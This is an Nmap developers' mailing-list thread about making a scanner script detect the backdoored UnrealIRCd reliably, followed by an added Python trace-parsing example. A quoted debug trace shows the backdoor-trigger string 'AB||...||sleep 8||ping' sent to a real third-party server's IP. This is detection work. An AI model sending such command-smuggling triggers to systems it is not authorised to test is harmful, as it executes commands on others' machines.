Nmap Development mailing list archives

Re: Always practice safe software: a lesson from UnrealIRCd


From: Ron <ron () skullsecurity net>
Date: Thu, 24 Jun 2010 10:05:04 -0500

The attached version of the code, in my testing, had no false positives and no false negatives. The downside is, it's 
incredibly slow. 

A mutex + 10 second delay and 20 second timeout had 5 good, 1 false positive. A mutex + 25 second delay + 35 second 
timeout = perfect, 5 out of 5 on my test list with no false positives/negatives. So basically, 25 seconds for every 
infected host, 35 seconds for every host that times out, and basically no time for hosts that aren't affected either 
way. 

Something that would be useful here would be a semaphore -- let 3 or 4 go in parallel, but no more. I don't think we 
have that capability right now, though, and I'm not sure if that would ruin our results. 

Thoughts?

On Wed, 23 Jun 2010 18:38:05 -0600 David Fifield <david () bamsoftware com> wrote:
> On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
> > I found a better way to detect vulnerable servers, but unfortunately
> > it isn't something an average person can do (requires a DNS
> > authoritative server).
> >
> > From the original list, with a 20 second delay and 40 second timeout,
> > on the list you provided earlier, I found:
> > o 4 vulnerable servers
> > o 3 were discovered
> > o 1 false positive
> > o 1 was missed because of 'too many reconnects'
> >
> > So, that isn't very good. We can make the delays even longer, and I
> > think it'll get rather accurate, but I don't think that's ideal,
> > either. I'm going to give mutex a shot, still.
>
> Ah, so the timing is accurate enough, but it's not really an accurate
> reflection of whether the vulnerability exists. I tried using
> irc-unrealircd-backdoor.command to ping a server, and against all the
> 9- and 11-second hosts, a vulnerability was detected but I didn't
> receive any pings.
>
> It looks like the delay is really being caused by a lack of an auth
> response.
>
> Discovered open port 6667/tcp on 91.121.137.140
> NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
> NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16
> NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667]
> NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
> NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1
> NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1.
> NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
> NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
> NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
> NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
> NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
> NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
> NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
> NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
> NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered..
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered
>
> David Fifield
> _______________________________________________
> Sent through the nmap-dev mailing list
> http://cgi.insecure.org/mailman/listinfo/nmap-dev
> Archived at http://seclists.org/nmap-dev/


-- 
Ron Bowes
http://www.skullsecurity.org
http://www.twitter.com/iagox86

Attachment: irc-unrealircd-backdoor.nse
Attachment: _bin
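As an added illustration of David's point that the 9- and 11-second delays come from the server's own ident/hostname lookup rather than from the probe, the following Python parses an NSOCK/NSE debug trace like the one quoted above, measures how long each read waited on the server, and reports which phase the long wait fell in. This is example code written for this page; it is neither the attached script nor part of Nmap. The first trace is the read/write events from David's mail, reflowed to one event per line; the second is constructed to show the opposite pattern. The phase labels ("lookup", "registration") and the 5-second threshold are assumptions of the example.

```python
"""Attribute the delay in an Nmap NSE/NSOCK debug trace to the server phase
in which it occurred (added example; not Nmap's or the attached script's code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Read/write events from David's trace in this thread, reflowed to one event
# per line; each NSE payload line follows the READ SUCCESS it belongs to.
THREAD_TRACE = """\
NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered
"""

# Constructed trace (not from the thread): the lookup chatter arrives quickly
# and the long wait sits on the registration reply instead.
CONSTRUCTED_TRACE = """\
NSOCK (0.5100s) Write request for 50 bytes to IOD #3 EID 11 [192.0.2.10:6667]
NSOCK (0.5100s) Callback: WRITE SUCCESS for EID 11 [192.0.2.10:6667]
NSOCK (0.5200s) Read request from IOD #3 [192.0.2.10:6667] (timeout: 20000ms) EID 12
NSOCK (0.6200s) Callback: READ SUCCESS for EID 12 [192.0.2.10:6667] (60 bytes)
NSE: TCP 192.0.2.1:40000 < 192.0.2.10:6667 | :irc.example NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (0.6300s) Read request from IOD #3 [192.0.2.10:6667] (timeout: 20000ms) EID 13
NSOCK (9.6300s) Callback: READ SUCCESS for EID 13 [192.0.2.10:6667] (40 bytes)
NSE: TCP 192.0.2.1:40000 < 192.0.2.10:6667 | :irc.example 451 AB :You have not registered
"""

TS_RE = re.compile(r"^NSOCK \((\d+\.\d+)s\) (.*)$")
PAYLOAD_RE = re.compile(r"^NSE: TCP \S+ < \S+ \| (.*)$")


@dataclass
class Read:
    requested_at: float
    completed_at: float
    payload: str = ""

    @property
    def wait(self) -> float:
        return self.completed_at - self.requested_at

    @property
    def phase(self) -> str:
        # Phase labels are this example's own: classify a read by what the
        # server said when it completed.
        if "NOTICE AUTH" in self.payload:
            return "lookup"        # hostname/ident lookup chatter
        if re.search(r"\s451\s", self.payload):
            return "registration"  # numeric 451 reply, lookup phase is over
        return "other"


def parse_reads(trace: str) -> List[Read]:
    """Pair each 'Read request' with the 'READ SUCCESS' that completes it and
    attach the payload NSE prints right after it."""
    reads: List[Read] = []
    pending: Optional[float] = None
    for line in trace.splitlines():
        m = TS_RE.match(line)
        if m:
            t, rest = float(m.group(1)), m.group(2)
            if rest.startswith("Read request"):
                pending = t
            elif rest.startswith("Callback: READ SUCCESS") and pending is not None:
                reads.append(Read(pending, t))
                pending = None
            continue
        m = PAYLOAD_RE.match(line)
        if m and reads and not reads[-1].payload:
            reads[-1].payload = m.group(1)
    return reads


def attribute_delay(trace: str, threshold: float = 5.0) -> Dict[str, object]:
    """Report the longest wait, the phase it fell in, and what that implies for
    a timing-based check (the threshold is an assumption of this example)."""
    reads = parse_reads(trace)
    longest = max(reads, key=lambda r: r.wait)
    slow = [r for r in reads if r.wait >= threshold]
    # A long wait that ends in lookup chatter is the server's own ident/DNS
    # timeout; only a long wait after that phase deserves a second look.
    after_lookup = [r for r in slow if r.phase != "lookup"]
    if after_lookup:
        verdict = "delay after lookup phase; confirm out of band"
    elif slow:
        verdict = "delay explained by ident/hostname lookup"
    else:
        verdict = "no significant delay"
    return {
        "longest_wait": round(longest.wait, 3),
        "longest_phase": longest.phase,
        "slow_reads": [(round(r.wait, 3), r.phase) for r in slow],
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, trace in (("thread", THREAD_TRACE), ("constructed", CONSTRUCTED_TRACE)):
        print(name, attribute_delay(trace))
```

On David's trace the 11.4-second wait ends with the "No ident response" notice, so it is the server's ident timeout and the script is right not to count it; in the constructed trace the lookup notices arrive within a tenth of a second and the wait sits on the 451 reply, which is the only kind of gap a timing check should treat as a signal, and even then the out-of-band confirmation Ron describes is what settles it.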

